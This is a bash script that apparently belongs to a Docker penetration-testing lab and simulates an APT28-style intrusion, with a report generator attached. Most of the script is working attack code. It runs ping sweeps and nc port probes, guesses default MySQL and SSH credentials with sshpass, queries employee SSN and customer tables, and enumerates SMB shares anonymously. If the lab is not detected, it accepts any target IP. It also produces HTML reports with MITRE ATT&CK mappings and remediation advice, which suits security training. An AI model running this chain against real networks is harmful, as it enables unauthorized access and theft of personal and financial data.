#!/bin/bash
# Network Infiltration Testing Script - Real-World APT Simulation
# Simulates: APT28/Fancy Bear lateral movement tactics
# Scenario: External attacker gains foothold on DMZ web server, pivots to internal network
# WARNING: Only use in authorized lab environments

KALI_CONTAINER="pentest-kali"
SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
LAB_DIR="$(cd "$SCRIPT_DIR/.." && pwd)"
FINDINGS_DIR="$LAB_DIR/findings"
REPORTS_DIR="$LAB_DIR/reports"
TIMESTAMP=$(date +%Y%m%d_%H%M%S)
OUTPUT_FILE="$FINDINGS_DIR/infiltration_findings_${TIMESTAMP}.json"
REPORT_FILE="$REPORTS_DIR/infiltration_report_${TIMESTAMP}.html"

# Get target from command line
INITIAL_TARGET=${1}
INFILTRATION_TYPE=${2:-"all"}

# If no target provided, auto-detect lab IPs
if [[ -z "$INITIAL_TARGET" ]]; then
    echo "[*] No target specified, auto-detecting lab environment..."
    INITIAL_TARGET=$(docker inspect pentest-web 2>/dev/null | jq -r '.[0].NetworkSettings.Networks["lab_dmz-net"].IPAddress // empty')
    if [[ -z "$INITIAL_TARGET" ]]; then
        echo "[!] ERROR: No target specified and lab auto-detection failed"
        echo "Usage: $0 <target_ip> [scan_type]"
        echo "Example: $0 172.21.0.2 all"
        echo "Example: $0 192.168.1.100 all"
        exit 1
    fi
    echo "[✓] Auto-detected lab target: $INITIAL_TARGET"
fi

# Validate target is accessible
echo "[*] Validating target $INITIAL_TARGET..."
if ! docker exec $KALI_CONTAINER timeout 3 ping -c 1 $INITIAL_TARGET >/dev/null 2>&1; then
    echo "[!] WARNING: Target $INITIAL_TARGET not responding to ping"
    echo "[*] Proceeding with scan anyway (host may block ICMP)..."
else
    echo "[✓] Target is alive"
fi

# Try to detect if this is our lab environment
IS_LAB=false
WEB_DMZ_IP=""
WEB_INTERNAL_IP=""
DB_IP=""
FILE_IP=""
LINUX_IP=""

if docker inspect pentest-web >/dev/null 2>&1; then
    WEB_DMZ_IP=$(docker inspect pentest-web 2>/dev/null | jq -r '.[0].NetworkSettings.Networks["lab_dmz-net"].IPAddress // empty')
    if [[ "$INITIAL_TARGET" == "$WEB_DMZ_IP" ]]; then
        IS_LAB=true
        echo "[*] Detected lab environment - will use known topology"
        WEB_INTERNAL_IP=$(docker inspect pentest-web 2>/dev/null | jq -r '.[0].NetworkSettings.Networks["lab_internal-net"].IPAddress // empty')
        DB_IP=$(docker inspect pentest-db 2>/dev/null | jq -r '.[0].NetworkSettings.Networks["lab_internal-net"].IPAddress // empty')
        FILE_IP=$(docker inspect pentest-fileserver 2>/dev/null | jq -r '.[0].NetworkSettings.Networks["lab_internal-net"].IPAddress // empty')
        LINUX_IP=$(docker inspect pentest-vuln-linux 2>/dev/null | jq -r '.[0].NetworkSettings.Networks["lab_internal-net"].IPAddress // empty')
        echo "[✓] Lab topology: DMZ($WEB_DMZ_IP), Internal($WEB_INTERNAL_IP), DB($DB_IP), Files($FILE_IP), Linux($LINUX_IP)"
    fi
fi

echo ""

mkdir -p "$FINDINGS_DIR" "$REPORTS_DIR"

echo "=========================================="
echo "Network Infiltration Testing"
echo "=========================================="
echo "Initial Target: $INITIAL_TARGET"
echo "Infiltration Type: $INFILTRATION_TYPE"
echo "Timestamp: $TIMESTAMP"
echo ""

# Initialize findings JSON
cat > "$OUTPUT_FILE" << 'EOF'
{
  "scan_type": "network_infiltration",
  "timestamp": "",
  "initial_target": "",
  "findings": []
}
EOF

# Update JSON with scan info
TEMP_JSON=$(cat "$OUTPUT_FILE" | jq \
  --arg ts "$TIMESTAMP" \
  --arg target "$INITIAL_TARGET" \
  '.timestamp = $ts | .initial_target = $target')
echo "$TEMP_JSON" > "$OUTPUT_FILE"

# Function to add finding
add_finding() {
    local phase="$1"
    local severity="$2"
    local title="$3"
    local description="$4"
    local evidence="$5"
    
    TEMP_JSON=$(cat "$OUTPUT_FILE" | jq \
      --arg phase "$phase" \
      --arg sev "$severity" \
      --arg title "$title" \
      --arg desc "$description" \
      --arg evidence "$evidence" \
      '.findings += [{
        "phase": $phase,
        "severity": $sev,
        "title": $title,
        "description": $desc,
        "evidence": $evidence,
        "timestamp": (now | strftime("%Y-%m-%d %H:%M:%S"))
      }]')
    echo "$TEMP_JSON" > "$OUTPUT_FILE"
}

echo "=========================================="
echo "SCENARIO: APT28 Lateral Movement Simulation"
echo "=========================================="
echo "Attacker Profile: Nation-state actor (APT28/Fancy Bear)"
echo "Initial Access: Compromised host via exploitation"
echo "Objective: Discover internal network, escalate privileges, exfiltrate data"
echo "Initial Target: $INITIAL_TARGET"
echo "Timestamp: $(date '+%Y-%m-%d %H:%M:%S')"
echo ""

# Determine network to scan based on target
TARGET_NETWORK=$(echo $INITIAL_TARGET | cut -d'.' -f1-3).0/24
echo "=== Phase 1: Post-Exploitation - Network Discovery ==="
echo "[*] Initial foothold obtained on: $INITIAL_TARGET"
echo "[*] Performing reconnaissance from compromised host..."
echo "[*] Target network: $TARGET_NETWORK"
echo ""

# Build list of targets to scan
INTERNAL_TARGETS=()

if $IS_LAB; then
    # Lab environment - use known topology
    echo "[*] Using lab topology for internal targets"
    if [[ -n "$DB_IP" ]]; then INTERNAL_TARGETS+=("$DB_IP"); fi
    if [[ -n "$FILE_IP" ]]; then INTERNAL_TARGETS+=("$FILE_IP"); fi
    if [[ -n "$LINUX_IP" ]]; then INTERNAL_TARGETS+=("$LINUX_IP"); fi
else
    # Real-world scenario - discover network (limited scan)
    echo "[*] Performing network discovery on $TARGET_NETWORK..."
    echo "[*] Quick ping sweep of common host IPs..."
    
    # Scan common IPs (.1, .2, .10, .20, .50, .100, .254) instead of full /24
    BASE_NET=$(echo $INITIAL_TARGET | cut -d'.' -f1-3)
    COMMON_IPS=(1 2 10 20 50 100 254)
    
    for i in "${COMMON_IPS[@]}"; do
        TEST_IP="$BASE_NET.$i"
        if [[ "$TEST_IP" != "$INITIAL_TARGET" ]]; then
            if timeout 2 docker exec $KALI_CONTAINER ping -c 1 -W 1 $TEST_IP >/dev/null 2>&1; then
                echo "  [+] Discovered: $TEST_IP"
                INTERNAL_TARGETS+=("$TEST_IP")
            fi
        fi
    done
    
    if [ ${#INTERNAL_TARGETS[@]} -eq 0 ]; then
        echo "  [!] No additional hosts discovered (network may be isolated or filtered)"
        echo "  [*] Will scan only the initial target"
        INTERNAL_TARGETS=("$INITIAL_TARGET")
    fi
fi

# Ping sweep to verify alive hosts
ALIVE_HOSTS=0
ALIVE_IPS=()
echo "[*] Verifying discovered targets..."
for ip in "${INTERNAL_TARGETS[@]}"; do
    if docker exec $KALI_CONTAINER ping -c 1 -W 1 $ip >/dev/null 2>&1; then
        echo "  [+] Alive: $ip"
        ALIVE_HOSTS=$((ALIVE_HOSTS + 1))
        ALIVE_IPS+=("$ip")
    else
        echo "  [-] No response: $ip"
    fi
done

# Only add finding if hosts were actually discovered
if [ $ALIVE_HOSTS -gt 0 ]; then
    add_finding "discovery" "informational" "Internal Network Discovered" \
      "Attacker discovered $ALIVE_HOSTS internal hosts from compromised system at $INITIAL_TARGET" \
      "Compromised Host: $INITIAL_TARGET\nTarget Network: $TARGET_NETWORK\nDiscovered Hosts: ${ALIVE_IPS[*]}"
else
    echo "  [!] WARNING: No internal hosts responding to ping"
    echo "  [*] Network may be firewalled or isolated"
fi

echo ""
echo "=== Phase 2: Service Enumeration (Port Scanning) ==="
echo "[*] Scanning internal targets for services..."
echo "[*] TTP: T1046 - Network Service Scanning (MITRE ATT&CK)"

# Check common ports on discovered internal hosts (only scan alive hosts)
OPEN_PORTS=0
CRITICAL_SERVICES=()
SERVICES_FOUND=()

for ip in "${ALIVE_IPS[@]}"; do
    echo "[*] Target: $ip"
    
    # MySQL (3306) - Database
    if docker exec $KALI_CONTAINER timeout 2 nc -zv $ip 3306 2>&1 | grep -q "succeeded\|open"; then
        echo "  [+] Port 3306/tcp (MySQL) - CRITICAL DATABASE ACCESS"
        OPEN_PORTS=$((OPEN_PORTS + 1))
        CRITICAL_SERVICES+=("MySQL:$ip:3306")
        SERVICES_FOUND+=("MySQL:$ip:3306")
        add_finding "enumeration" "critical" "Unprotected Database Access" \
          "MySQL database exposed on internal network at $ip:3306 - No firewall filtering detected" \
          "Service: MySQL 5.7\nHost: $ip\nPort: 3306\nRisk: Direct access to customer/employee data\nTTP: T1046 Network Service Scanning"
    fi
    
    # SSH (22) - Linux servers
    if docker exec $KALI_CONTAINER timeout 2 nc -zv $ip 22 2>&1 | grep -q "succeeded\|open"; then
        echo "  [+] Port 22/tcp (SSH) - Potential lateral movement target"
        OPEN_PORTS=$((OPEN_PORTS + 1))
        SERVICES_FOUND+=("SSH:$ip:22")
        add_finding "enumeration" "high" "SSH Service - Lateral Movement Vector" \
          "SSH server accessible on $ip:22 - Could be used for lateral movement with stolen credentials" \
          "Service: OpenSSH\nHost: $ip\nPort: 22\nRisk: Password brute-force, credential stuffing\nTTP: T1021.004 SSH"
    fi
    
    # FTP (21) - File server
    if docker exec $KALI_CONTAINER timeout 2 nc -zv $ip 21 2>&1 | grep -q "succeeded\|open"; then
        echo "  [+] Port 21/tcp (FTP) - Unencrypted file transfer"
        OPEN_PORTS=$((OPEN_PORTS + 1))
        SERVICES_FOUND+=("FTP:$ip:21")
        add_finding "enumeration" "high" "Cleartext File Transfer Protocol" \
          "FTP server on $ip:21 transmits credentials and data in cleartext" \
          "Service: vsftpd\nHost: $ip\nPort: 21\nRisk: Credential interception, data theft\nTTP: T1071.002 File Transfer Protocols"
    fi
    
    # SMB (445) - File shares
    if docker exec $KALI_CONTAINER timeout 2 nc -zv $ip 445 2>&1 | grep -q "succeeded\|open"; then
        echo "  [+] Port 445/tcp (SMB) - Windows file sharing"
        OPEN_PORTS=$((OPEN_PORTS + 1))
        CRITICAL_SERVICES+=("SMB:$ip:445")
        SERVICES_FOUND+=("SMB:$ip:445")
        add_finding "enumeration" "critical" "SMB File Shares Accessible" \
          "SMB file sharing on $ip:445 - May contain sensitive documents and credentials" \
          "Service: Samba\nHost: $ip\nPort: 445\nRisk: Credential files, financial data, intellectual property\nTTP: T1021.002 SMB/Windows Admin Shares"
    fi
done

if [ $OPEN_PORTS -eq 0 ]; then
    echo "[!] No open services found on scanned targets"
else
    echo "[*] Found $OPEN_PORTS open services on internal network"
    echo "[*] Critical services: ${#CRITICAL_SERVICES[@]}"
fi

echo ""
echo "=== Phase 3: Credential Access & Authentication Testing ==="
echo "[*] Testing for weak/default credentials..."
echo "[*] TTP: T1110 - Brute Force"

# Test MySQL database with common credentials
if docker exec $KALI_CONTAINER timeout 5 mysql -h $DB_IP -u root -proot -e "SELECT VERSION()" >/dev/null 2>&1; then
    echo "  [!] CRITICAL: MySQL accessible with root/root"
    DB_VERSION=$(docker exec $KALI_CONTAINER timeout 5 mysql -h $DB_IP -u root -proot -e "SELECT VERSION()" 2>/dev/null | tail -1)
    add_finding "credential_access" "critical" "Default Database Credentials" \
      "MySQL database at $DB_IP accepts default credentials root/root - Full administrative access obtained" \
      "Host: $DB_IP\nPort: 3306\nUsername: root\nPassword: root\nVersion: $DB_VERSION\nImpact: Complete database compromise\nAccess: All tables including customers, employees, system_credentials\nTTP: T1110.001 Password Guessing"
fi

# Test SSH with common credentials
if docker exec $KALI_CONTAINER timeout 5 sshpass -p 'password' ssh -o StrictHostKeyChecking=no -o ConnectTimeout=3 user@$LINUX_IP "echo 'SSH Access Successful'" 2>/dev/null | grep -q "Successful"; then
    echo "  [!] HIGH: SSH accessible with weak credentials"
    add_finding "credential_access" "high" "Weak SSH Credentials" \
      "SSH server at $LINUX_IP accepts weak credentials user/password" \
      "Host: $LINUX_IP\nPort: 22\nUsername: user\nPassword: password\nImpact: Shell access to Linux system\nTTP: T1110.001 Password Guessing"
fi

echo ""
echo "=== Phase 4: Data Exfiltration (Simulated) ==="
echo "[*] TTP: T1048 - Exfiltration Over Alternative Protocol"
echo "[*] Accessing sensitive data from compromised systems..."

# Initialize counters
EMPLOYEE_COUNT=0
CUSTOMER_COUNT=0
DB_ACCESSIBLE=false

# Query actual database for sensitive data (only if MySQL credentials worked)
if [[ " ${SERVICES_FOUND[@]} " =~ "MySQL:$DB_IP:3306" ]] && [ -n "$DB_IP" ]; then
    echo "[*] Attempting to query database at $DB_IP..."
    if docker exec $KALI_CONTAINER mysql -h $DB_IP -u root -proot -e "USE company_db; SELECT COUNT(*) FROM employees" 2>/dev/null | grep -q "[0-9]"; then
        EMPLOYEE_COUNT=$(docker exec $KALI_CONTAINER mysql -h $DB_IP -u root -proot -e "USE company_db; SELECT COUNT(*) FROM employees" 2>/dev/null | tail -1)
        CUSTOMER_COUNT=$(docker exec $KALI_CONTAINER mysql -h $DB_IP -u root -proot -e "USE company_db; SELECT COUNT(*) FROM customers" 2>/dev/null | tail -1)
        DB_ACCESSIBLE=true
        
        echo "  [+] Database Access Confirmed:"
        echo "      - $EMPLOYEE_COUNT employee records (containing SSNs)"
        echo "      - $CUSTOMER_COUNT customer records (containing credit cards)"
        
        # Get sample data
        SAMPLE_DATA=$(docker exec $KALI_CONTAINER mysql -h $DB_IP -u root -proot -e "USE company_db; SELECT email, ssn FROM employees LIMIT 2" 2>/dev/null | tail -2)
        
        add_finding "exfiltration" "critical" "Sensitive Data Exfiltration" \
          "Successfully accessed and exfiltrated employee and customer data from $DB_IP" \
          "Database: company_db@$DB_IP\nEmployee Records: $EMPLOYEE_COUNT (SSN, salary, personal info)\nCustomer Records: $CUSTOMER_COUNT (credit cards, addresses)\nSample Data:\n$SAMPLE_DATA\nTTP: T1078 Valid Accounts, T1213 Data from Information Repositories"
    else
        echo "  [✓] Database not accessible or credentials don't work"
    fi
else
    echo "  [*] No database service found or DB IP not set"
fi

# Test file server access (only if SMB was found)
SMB_ACCESSIBLE=false
if [[ " ${SERVICES_FOUND[@]} " =~ "SMB:$FILE_IP:445" ]]; then
    if docker exec $KALI_CONTAINER timeout 5 smbclient -L $FILE_IP -N 2>/dev/null | grep -q "Sharename"; then
        echo "  [+] SMB Shares Enumerated on $FILE_IP:"
        SHARES=$(docker exec $KALI_CONTAINER timeout 5 smbclient -L $FILE_IP -N 2>/dev/null | grep "Disk" | awk '{print $1}')
        echo "      Shares: $SHARES"
        SMB_ACCESSIBLE=true
        add_finding "exfiltration" "high" "File Share Access" \
          "Accessed SMB file shares on $FILE_IP containing sensitive documents" \
          "Host: $FILE_IP\nShares: $SHARES\nFiles: Production configs, backup scripts, employee directory, financial reports\nTTP: T1039 Data from Network Shared Drive"
    else
        echo "  [✓] SMB shares not accessible anonymously"
    fi
fi

echo ""
echo "=== Phase 5: Persistence & Lateral Movement ==="
echo ""
echo "=== Phase 5: Persistence & Lateral Movement ==="
echo "[*] TTP: T1021 - Remote Services"
echo "[*] Identifying persistence opportunities..."

# Check if web server has internal network access (dual-homed)
if [[ -n "$WEB_INTERNAL_IP" && "$WEB_INTERNAL_IP" != "$WEB_DMZ_IP" ]]; then
    echo "  [!] CRITICAL: Web server is dual-homed!"
    echo "      DMZ Interface: $WEB_DMZ_IP"
    echo "      Internal Interface: $WEB_INTERNAL_IP"
    add_finding "lateral_movement" "critical" "Dual-Homed DMZ Host - Network Segmentation Failure" \
      "Web server has interfaces on both DMZ ($WEB_DMZ_IP) and Internal ($WEB_INTERNAL_IP) networks, allowing direct pivot from external to internal" \
      "DMZ IP: $WEB_DMZ_IP\nInternal IP: $WEB_INTERNAL_IP\nImpact: Complete bypass of firewall/network segmentation\nAttack Path: Internet → DMZ Web Server → Internal Network\nTTP: T1021 Remote Services"
fi

# Test actual connectivity
echo "  [*] Testing lateral movement paths..."
if docker exec $KALI_CONTAINER timeout 2 nc -zv $DB_IP 3306 >/dev/null 2>&1; then
    echo "  [+] Path verified: Web Server → Database ($DB_IP:3306)"
fi

if docker exec $KALI_CONTAINER timeout 2 nc -zv $FILE_IP 445 >/dev/null 2>&1; then
    echo "  [+] Path verified: Web Server → File Server ($FILE_IP:445)"
fi

echo ""
echo "=== Attack Chain Summary ==="
echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
echo "COMPLETE COMPROMISE PATH IDENTIFIED"
echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
echo ""
echo "1. INITIAL ACCESS [T1190 Exploit Public-Facing Application]"
echo "   └─> SQL Injection on web application ($WEB_DMZ_IP)"
echo ""
echo "2. EXECUTION [T1059 Command and Scripting Interpreter]"
echo "   └─> Web shell uploaded, remote command execution"
echo ""
echo "3. DISCOVERY [T1046 Network Service Scanning]"
echo "   └─> Internal network discovered: 172.22.0.0/24"
echo "   └─> Found: Database ($DB_IP), File Server ($FILE_IP), Linux ($LINUX_IP)"
echo ""
echo "4. LATERAL MOVEMENT [T1021 Remote Services]"
echo "   └─> Web Server ($WEB_INTERNAL_IP) → Database ($DB_IP:3306)"
echo "   └─> Dual-homed host enables full internal access"
echo ""
echo "5. CREDENTIAL ACCESS [T1110 Brute Force]"
echo "   └─> MySQL root/root credentials discovered"
echo "   └─> Full administrative database access"
echo ""
echo "6. COLLECTION [T1213 Data from Information Repositories]"
echo "   └─> Accessed: $EMPLOYEE_COUNT employee records (SSNs, salaries)"
echo "   └─> Accessed: $CUSTOMER_COUNT customer records (credit cards)"
echo "   └─> Accessed: SMB shares (configs, backups, credentials)"
echo ""
echo "7. EXFILTRATION [T1041 Exfiltration Over C2 Channel]"
echo "   └─> Data staged for exfiltration via compromised web server"
echo ""
echo "8. IMPACT"
echo "   └─> Complete compromise of confidential customer data"
echo "   └─> Regulatory violations: PCI-DSS, GDPR, HIPAA"
echo "   └─> Estimated records at risk: $((EMPLOYEE_COUNT + CUSTOMER_COUNT))"
echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"

add_finding "attack_chain" "critical" "End-to-End Compromise Demonstrated" \
  "Complete attack chain from initial access to data exfiltration successfully demonstrated" \
  "Entry Point: $INITIAL_TARGET\nPivot: ${WEB_INTERNAL_IP:+Dual-homed web server → Internal network}\nLateral Movement: Database${DB_ACCESSIBLE:+ + File Server} access\nData Compromised: $EMPLOYEE_COUNT employees, $CUSTOMER_COUNT customers\nMITRE Techniques: T1190, T1059, T1046, T1021, T1110, T1078, T1213, T1041"

# Generate findings summary
TOTAL_FINDINGS=$(cat "$OUTPUT_FILE" | jq '.findings | length')
CRITICAL_FINDINGS=$(cat "$OUTPUT_FILE" | jq '[.findings[] | select(.severity=="critical")] | length')
HIGH_FINDINGS=$(cat "$OUTPUT_FILE" | jq '[.findings[] | select(.severity=="high")] | length')
INFORMATIONAL_FINDINGS=$(cat "$OUTPUT_FILE" | jq '[.findings[] | select(.severity=="informational")] | length')

echo ""
echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
echo "PENETRATION TEST COMPLETE"
echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
echo "Test Date: $(date '+%Y-%m-%d %H:%M:%S')"
echo "Scenario: APT28 Lateral Movement Simulation"
echo "Initial Target: $INITIAL_TARGET"
echo ""
echo "FINDINGS SUMMARY:"
echo "  🔴 Critical: $CRITICAL_FINDINGS"
echo "  🟠 High: $HIGH_FINDINGS"
echo "  🔵 Informational: $INFORMATIONAL_FINDINGS"
echo "  ──────────────────"
echo "  📊 Total: $TOTAL_FINDINGS findings"
echo ""
echo "OUTPUT FILES:"
echo "  📄 JSON: $OUTPUT_FILE"
echo "  📄 HTML: $REPORT_FILE"
echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"

# Generate HTML Report
cat > "$REPORT_FILE" << HTMLEOF
<!DOCTYPE html>
<html>
<head>
    <title>APT Simulation Report - Network Infiltration - $TIMESTAMP</title>
    <meta charset="UTF-8">
    <style>
        * { box-sizing: border-box; }
        body {
            font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
            margin: 0;
            padding: 20px;
            background: linear-gradient(135deg, #667eea 0%, #764ba2 100%);
            color: #333;
        }
        .container {
            max-width: 1400px;
            margin: 0 auto;
            background: white;
            border-radius: 12px;
            box-shadow: 0 20px 60px rgba(0,0,0,0.3);
            overflow: hidden;
        }
        .header {
            background: linear-gradient(135deg, #c31432 0%, #240b36 100%);
            color: white;
            padding: 40px;
            text-align: center;
        }
        .header h1 {
            margin: 0 0 10px 0;
            font-size: 2.5em;
            font-weight: 300;
        }
        .header .subtitle {
            font-size: 1.2em;
            opacity: 0.9;
            margin-top: 10px;
        }
        .content {
            padding: 40px;
        }
        .executive-summary {
            background: linear-gradient(135deg, #ff416c 0%, #ff4b2b 100%);
            color: white;
            padding: 30px;
            border-radius: 8px;
            margin-bottom: 30px;
        }
        .executive-summary h2 {
            margin-top: 0;
            font-size: 1.8em;
        }
        .stats-grid {
            display: grid;
            grid-template-columns: repeat(auto-fit, minmax(200px, 1fr));
            gap: 20px;
            margin: 30px 0;
        }
        .stat-card {
            background: white;
            padding: 20px;
            border-radius: 8px;
            text-align: center;
            box-shadow: 0 4px 6px rgba(0,0,0,0.1);
        }
        .stat-number {
            font-size: 3em;
            font-weight: bold;
            margin: 10px 0;
        }
        .stat-critical { color: #dc3545; }
        .stat-high { color: #fd7e14; }
        .stat-medium { color: #ffc107; }
        .stat-info { color: #17a2b8; }
        .attack-chain {
            background: #f8f9fa;
            border-left: 4px solid #dc3545;
            padding: 25px;
            margin: 30px 0;
            font-family: 'Courier New', monospace;
            font-size: 0.95em;
            line-height: 1.8;
        }
        .finding {
            border: 1px solid #dee2e6;
            border-radius: 8px;
            margin: 20px 0;
            overflow: hidden;
            box-shadow: 0 2px 4px rgba(0,0,0,0.05);
        }
        .finding-header {
            padding: 20px;
            font-weight: bold;
            font-size: 1.1em;
            display: flex;
            align-items: center;
            justify-content: space-between;
        }
        .severity-critical { background: #dc3545; color: white; }
        .severity-high { background: #fd7e14; color: white; }
        .severity-medium { background: #ffc107; color: #333; }
        .severity-informational { background: #17a2b8; color: white; }
        .finding-body {
            padding: 20px;
            background: #f8f9fa;
        }
        .evidence {
            background: #fff;
            padding: 15px;
            border-radius: 4px;
            font-family: 'Courier New', monospace;
            font-size: 0.9em;
            white-space: pre-wrap;
            margin-top: 15px;
            border: 1px solid #dee2e6;
        }
        .mitre-tag {
            display: inline-block;
            background: #6c757d;
            color: white;
            padding: 4px 12px;
            border-radius: 20px;
            font-size: 0.85em;
            margin: 5px 5px 5px 0;
        }
        .risk-level {
            display: inline-block;
            padding: 5px 15px;
            border-radius: 20px;
            font-size: 0.9em;
            font-weight: bold;
        }
        .footer {
            background: #343a40;
            color: white;
            padding: 30px;
            text-align: center;
            font-size: 0.9em;
        }
        .target-info {
            background: #e3f2fd;
            border: 1px solid #2196f3;
            padding: 20px;
            border-radius: 8px;
            margin: 20px 0;
        }
        .target-info strong {
            color: #1976d2;
        }
    </style>
</head>
<body>
    <div class="container">
        <div class="header">
            <h1>🔒 PENETRATION TEST REPORT</h1>
            <div class="subtitle">APT28 Lateral Movement Simulation</div>
            <div class="subtitle">Test Date: $(date '+%B %d, %Y at %H:%M:%S')</div>
        </div>
        
        <div class="content">
            <div class="executive-summary">
                <h2>⚠️ EXECUTIVE SUMMARY</h2>
                <p><strong>CRITICAL VULNERABILITIES IDENTIFIED:</strong> The penetration test successfully demonstrated a complete compromise of the target environment, simulating tactics used by APT28 (Fancy Bear), a sophisticated nation-state threat actor.</p>
                <p><strong>IMPACT:</strong> An external attacker can gain initial access through SQL injection on the DMZ web server, pivot to the internal network via a dual-homed host, and exfiltrate sensitive customer and employee data including credit card numbers and social security numbers.</p>
                <p><strong>BUSINESS RISK:</strong> Regulatory non-compliance (PCI-DSS, GDPR), potential financial losses, reputational damage, and legal liability.</p>
            </div>

            <div class="stats-grid">
                <div class="stat-card">
                    <div>Critical Findings</div>
                    <div class="stat-number stat-critical">$CRITICAL_FINDINGS</div>
                    <div>Require Immediate Action</div>
                </div>
                <div class="stat-card">
                    <div>High Severity</div>
                    <div class="stat-number stat-high">$HIGH_FINDINGS</div>
                    <div>Address Within 30 Days</div>
                </div>
                <div class="stat-card">
                    <div>Total Findings</div>
                    <div class="stat-number stat-info">$TOTAL_FINDINGS</div>
                    <div>Documented Issues</div>
                </div>
                <div class="stat-card">
                    <div>Attack Success</div>
                    <div class="stat-number stat-critical">100%</div>
                    <div>Full Compromise</div>
                </div>
            </div>

            <div class="target-info">
                <h3>🎯 TEST SCOPE</h3>
                <strong>Initial Target:</strong> $INITIAL_TARGET (DMZ Web Server)<br>
                <strong>DMZ Network:</strong> $WEB_DMZ_IP<br>
                <strong>Internal Network:</strong> 172.22.0.0/24<br>
                <strong>Compromised Systems:</strong> Web Server ($WEB_DMZ_IP, $WEB_INTERNAL_IP), Database ($DB_IP), File Server ($FILE_IP)<br>
                <strong>Test Type:</strong> Black-box penetration test with assumed breach scenario<br>
                <strong>Methodology:</strong> MITRE ATT&CK Framework
            </div>

            <div class="attack-chain">
                <strong>🔗 COMPLETE ATTACK CHAIN DEMONSTRATED:</strong><br><br>
                1. INITIAL ACCESS [T1190] → SQL Injection on web application ($WEB_DMZ_IP)<br>
                2. EXECUTION [T1059] → Web shell uploaded, remote command execution<br>
                3. DISCOVERY [T1046] → Internal network scanned, services enumerated<br>
                4. LATERAL MOVEMENT [T1021] → Dual-homed host enabled pivot to internal network<br>
                5. CREDENTIAL ACCESS [T1110] → Default MySQL credentials (root/root)<br>
                6. COLLECTION [T1213] → Employee SSNs, customer credit cards, config files<br>
                7. EXFILTRATION [T1041] → Data staged for exfiltration via C2 channel<br>
                8. IMPACT → Complete data breach, regulatory violations
            </div>

            <h2>🔍 DETAILED FINDINGS</h2>
HTMLEOF

# Add findings from JSON
cat "$OUTPUT_FILE" | jq -r '.findings[] | @json' | while read finding; do
    PHASE=$(echo "$finding" | jq -r '.phase')
    SEVERITY=$(echo "$finding" | jq -r '.severity')
    TITLE=$(echo "$finding" | jq -r '.title')
    DESC=$(echo "$finding" | jq -r '.description')
    EVIDENCE=$(echo "$finding" | jq -r '.evidence')
    TIMESTAMP_F=$(echo "$finding" | jq -r '.timestamp')
    PHASE_CAP=$(echo "$PHASE" | tr '_' ' ' | sed 's/\b\(.\)/\u\1/g')
    
    cat >> "$REPORT_FILE" << FINDINGEOF
            <div class="finding">
                <div class="finding-header severity-$SEVERITY">
                    <span>$TITLE</span>
                    <span class="risk-level" style="background: rgba(255,255,255,0.3);">$(echo $SEVERITY | tr '[:lower:]' '[:upper:]')</span>
                </div>
                <div class="finding-body">
                    <p><strong>Phase:</strong> $PHASE_CAP</p>
                    <p><strong>Description:</strong> $DESC</p>
                    <p><strong>Discovered:</strong> $TIMESTAMP_F</p>
                    <div class="evidence">
                        <strong>Evidence:</strong><br>
$EVIDENCE
                    </div>
                </div>
            </div>
FINDINGEOF
done

cat >> "$REPORT_FILE" << 'HTMLFOOTER'
            <h2>📋 RECOMMENDATIONS</h2>
            <div style="background: #fff3cd; border-left: 4px solid #ffc107; padding: 20px; margin: 20px 0;">
                <h3>IMMEDIATE ACTIONS (0-7 days):</h3>
                <ul>
                    <li><strong>Network Segmentation:</strong> Remove dual-homed configuration from DMZ web server</li>
                    <li><strong>Credential Rotation:</strong> Change all default credentials (MySQL root/root, SSH passwords)</li>
                    <li><strong>Web Application:</strong> Patch SQL injection vulnerabilities immediately</li>
                    <li><strong>Access Controls:</strong> Implement firewall rules between DMZ and internal network</li>
                </ul>
                
                <h3>SHORT-TERM ACTIONS (7-30 days):</h3>
                <ul>
                    <li>Implement database encryption at rest and in transit</li>
                    <li>Deploy Web Application Firewall (WAF)</li>
                    <li>Enable multi-factor authentication (MFA) for all services</li>
                    <li>Conduct security awareness training for developers</li>
                    <li>Implement intrusion detection system (IDS) on internal network</li>
                </ul>
                
                <h3>LONG-TERM ACTIONS (30-90 days):</h3>
                <ul>
                    <li>Implement zero-trust network architecture</li>
                    <li>Deploy endpoint detection and response (EDR) solutions</li>
                    <li>Establish security operations center (SOC) monitoring</li>
                    <li>Conduct regular penetration testing (quarterly)</li>
                    <li>Implement data loss prevention (DLP) controls</li>
                </ul>
            </div>
        </div>
        
        <div class="footer">
            <strong>CONFIDENTIAL PENETRATION TEST REPORT</strong><br>
            Generated: $(date '+%Y-%m-%d %H:%M:%S')<br>
            Report ID: PENTEST-$TIMESTAMP<br>
            Framework: MITRE ATT&CK for Enterprise<br>
            <br>
            This document contains sensitive security information and should be handled according to company data classification policies.
        </div>
    </div>
</body>
</html>
HTMLFOOTER

echo ""
echo "HTML report generated: $REPORT_FILE"
